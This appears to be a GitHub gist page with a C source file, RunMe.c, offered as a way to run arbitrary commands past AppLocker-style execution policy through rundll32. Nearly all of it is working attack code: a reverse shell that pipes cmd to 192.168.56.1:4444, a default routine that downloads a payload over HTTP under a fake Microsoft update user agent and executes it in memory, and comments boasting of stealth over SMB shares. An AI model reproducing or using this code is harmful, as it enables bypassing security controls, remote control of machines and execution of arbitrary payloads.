Skip to content

Instantly share code, notes, and snippets.

@hugsy hugsy/RunMe.c
Last active Nov 11, 2018

Embed
What would you like to do?
RunMe.c
/**
* Trick to run arbitrary command when code execution policy is enforced
* (i.e. AppLocker or equivalent). Works on Win98 (lol) and up - tested on 7/8
*
* To compile using CL as DLL:
* C:> cl.exe RunMe.c /LD /OUT:RunMe.dll
* To compile as PE (USE_DLL must be commented out):
* C:> cl.exe RunMe.c /OUT:RunMe.exe
*
* To execute under Windows:
* C:> rundll32 .\RunMe.dll,RunCommand calc
*
* or
* C:> rundll32 .\RunMe.dll,RunCommand cmd.exe /k whoami
*
* If cmd.exe is blocked, this can be invoked via Shortcut creation mechanism
* ... AND it works over an SMB share (stealthy++ :D)
*
* @_hugsy_
*
*/
#include <winsock2.h>
#include <windows.h>
#include <shellapi.h>
#include <tchar.h>
#include <stdio.h>
#include <string.h>
#include <malloc.h>
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "User32.lib")
#pragma comment(lib, "Advapi32.lib")
/**
* To compile as EXE, uncomment this or
* compile with the argument /DUSE_DLL
*/
//#define USE_DLL TRUE
#define HOST "192.168.56.1"
#define PORT 4444
#define DEFAULT_COMMAND "cmd"
#define TECHNIQUE 3
#if TECHNIQUE==1
#pragma comment(lib, "Shell32.lib")
static void ExecuteSimpleCommand(char* cmd, char* args)
{
SHELLEXECUTEINFO shExecInfo = {0, };
shExecInfo.cbSize = sizeof(SHELLEXECUTEINFO);
shExecInfo.fMask = 0;
shExecInfo.hwnd = NULL;
shExecInfo.lpVerb = "open";
shExecInfo.lpFile = _T(cmd);
shExecInfo.lpParameters = _T(args);
shExecInfo.lpDirectory = NULL;
shExecInfo.nShow = SW_NORMAL;
shExecInfo.hInstApp = NULL;
ShellExecuteEx(&shExecInfo);
return;
}
#endif
#if TECHNIQUE==2
static void ReverseCommand(char* cmd, char* args)
{
WSADATA wsaData = {0};
SOCKET sock;
int iResult;
PROCESS_INFORMATION pi;
STARTUPINFO si;
SOCKADDR_IN socket_info;
ZeroMemory (&si, sizeof(si));
ZeroMemory (&pi, sizeof(pi));
ZeroMemory (&socket_info, sizeof(socket_info));
/* Setup the socket */
iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (iResult != 0)
return;
sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
if (sock == INVALID_SOCKET)
return;
socket_info.sin_family = AF_INET;
socket_info.sin_addr.s_addr = inet_addr(HOST);
socket_info.sin_port = htons(PORT);
iResult = WSAConnect(sock, (SOCKADDR *)&socket_info, sizeof(socket_info), NULL, NULL, NULL, NULL);
if (iResult == SOCKET_ERROR)
goto cleanup;
/* Create the command process and redirect stdin/stdout/stderr to the socket */
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = (HANDLE)sock;
si.hStdOutput = (HANDLE)sock;
si.hStdError = (HANDLE)sock;
iResult = CreateProcess (NULL, cmd, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
if (!iResult)
goto cleanup;
WaitForSingleObject (pi.hProcess, INFINITE);
CloseHandle (pi.hThread);
CloseHandle (pi.hProcess);
cleanup:
WSACleanup();
return;
}
#endif
#if TECHNIQUE==3
#include <Winhttp.h>
#pragma comment(lib, "Winhttp.lib")
#define USE_HTTPS FALSE
#define HTTP_HOST L"192.168.56.1"
#define HTTP_METH L"GET"
#define HTTP_PATH L"/update-list-signed.gpg"
/**
* Download and execute a payload via HTTP(s)
*/
static void ExecuteHttpPayloadCommand(char* cmd, char* args)
{
BOOL bRes, bOk;
HINTERNET hSess=NULL, hConn=NULL, hReq=NULL;
LPCWSTR pswzHost = HTTP_HOST;
INTERNET_PORT iPort = USE_HTTPS ? INTERNET_DEFAULT_HTTPS_PORT : INTERNET_DEFAULT_HTTP_PORT;
LPVOID lpRes;
DWORD dwResSize, dwDwld, dwOld, i;
WINHTTP_PROXY_INFO proxyInfo;
bOk = FALSE;
bRes = WinHttpGetDefaultProxyConfiguration( &proxyInfo );
if(!bRes)
return;
hSess = WinHttpOpen(L"Microsoft Win32 Pool Update check",
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
proxyInfo.lpszProxy?proxyInfo.lpszProxy:WINHTTP_NO_PROXY_NAME,
proxyInfo.lpszProxyBypass?proxyInfo.lpszProxyBypass:WINHTTP_NO_PROXY_BYPASS,
0);
if (!hSess)
return;
hConn = WinHttpConnect(hSess, pswzHost, iPort, 0);
if(!hConn)
goto end_handle;
hReq = WinHttpOpenRequest(hConn, HTTP_METH, HTTP_PATH, NULL, WINHTTP_NO_REFERER,
WINHTTP_DEFAULT_ACCEPT_TYPES, 0);
if(!hReq)
goto end_http;
bRes = WinHttpSendRequest(hReq,
WINHTTP_NO_ADDITIONAL_HEADERS,
0,
WINHTTP_NO_REQUEST_DATA,
0,
0,
0);
if(!bRes)
goto end_req;
bRes = WinHttpReceiveResponse(hReq, NULL);
if(!bRes)
goto end_req;
WinHttpQueryDataAvailable(hReq, &dwResSize);
lpRes = VirtualAlloc(NULL, dwResSize+1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
ZeroMemory(lpRes, dwResSize+1);
WinHttpReadData(hReq, lpRes, dwResSize, &dwDwld);
FlushInstructionCache(GetCurrentProcess(), lpRes, dwResSize+1);
VirtualProtect(lpRes, dwResSize+1, PAGE_EXECUTE_READWRITE, &dwOld);
// add some delay
for(i=0; i<1<<31;i++);
bOk = TRUE;
end_req:
WinHttpCloseHandle(hReq);
end_http:
WinHttpCloseHandle(hConn);
end_handle:
WinHttpCloseHandle(hSess);
if (bOk){
__asm {
mov eax, lpRes;
call lpRes;
}
}
return;
}
#endif
#if TECHNIQUE==0
static void Lulz(char* cmd, char* args)
{
LPCTSTR text, title;
LPTSTR user;
DWORD userbufsz = 64;
title = "Ultimate disk cleaner.";
text = (LPTSTR)alloca(512);
user = (LPTSTR)alloca(userbufsz);
LPWSTR pFmt = "Hello %1 !\n"
"This program will now delete all files on your disk.\n\n"
"Thank you for running this program and have a nice day.\n" ;
if (!GetUserName(user, &userbufsz))
return;
if (!FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ARGUMENT_ARRAY,
pFmt,
0,
0,
text,
512,
(va_list*)&user)){
return;
}
MessageBox(NULL, cmd, title, MB_OK);
MessageBox(NULL, text, title, MB_OK);
return;
}
#endif
#ifdef USE_DLL
void __declspec(dllexport) RunCommand(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
#else
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
#endif
{
char *cmd, *args;
int i;
if (!lpszCmdLine || strlen(lpszCmdLine)==0){
cmd = _strdup(DEFAULT_COMMAND);
args = NULL;
} else {
cmd = _strdup(lpszCmdLine);
args = strchr(lpszCmdLine, ' ');
if (args){
i = (args - lpszCmdLine);
cmd[i] = '\x00';
}
}
#if TECHNIQUE == 1
ExecuteSimpleCommand(cmd, args);
#elif TECHNIQUE == 2
ReverseCommand(cmd, args);
#elif TECHNIQUE == 3
ExecuteHttpPayloadCommand(cmd, args);
#else
Lulz(cmd, args);
#endif
free(cmd);
#ifdef USE_DLL
return;
#else
return 0;
#endif
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.